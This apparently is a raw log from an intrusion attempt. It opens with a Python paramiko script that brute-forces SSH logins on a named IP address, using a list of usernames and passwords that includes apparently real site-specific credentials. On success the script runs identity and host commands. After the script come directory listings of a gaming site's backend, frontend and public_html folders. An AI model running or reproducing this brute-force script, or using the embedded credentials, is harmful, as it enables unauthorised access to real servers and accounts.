===SSH_PASS=== import sys sys.path.insert(0, '/home/nwrbcpcmisbeesit/.local/lib/python3.9/site-packages') try: import paramiko except Exception: sys.path.insert(0, '/root/.local/lib/python3.9/site-packages') import paramiko users = ['root','ubuntu','beesites','nwrbcpcmisbeesit','dev','admin','gamingsite','neptuneplay','mybusybee','backup','ops'] pwds = [ 'u1`o*8}u2SpdO*)Q9G:&+ge{^.)Pl2', 'gamingsitebeesit_neptuneplay', 'smycnyvwfpzcshjl','yhgpxztkzcgsfvlw','occizbyopnwvyhag', 'Audit@2026!secure', 'nwrbcpcmisbeesit','beesites','P@ssw0rd','Password1','admin','123456', 'Royaltech','N2aftBsrYchTQ6G5R9zLSxUwGxtoK7bv', ] target='76.13.188.2' for u in users: for p in pwds: try: c=paramiko.SSHClient() c.set_missing_host_key_policy(paramiko.AutoAddPolicy()) c.connect(target, port=22, username=u, password=p, timeout=6, banner_timeout=6, auth_timeout=6, allow_agent=False, look_for_keys=False) _,out,err=c.exec_command('id; hostname; uname -a', timeout=8) o=out.read().decode(errors='replace')+err.read().decode(errors='replace') print(f"[SUCCESS] {u}:{p} => {o[:200]}") c.close() break except paramiko.AuthenticationException: ===GS_TEST=== Index of /

Index of /

 NameLast modifiedSizeDescription

 neptuneplay-backend/ 2026-04-15 09:13 -  
 neptuneplay-frontend/ 2026-05-12 03:48 -  

===PUBLIC_HTML=== development nwrb-backend nwrb-frontend php.ini ===WWW=== development nwrb-backend nwrb-frontend php.ini PROC_DONE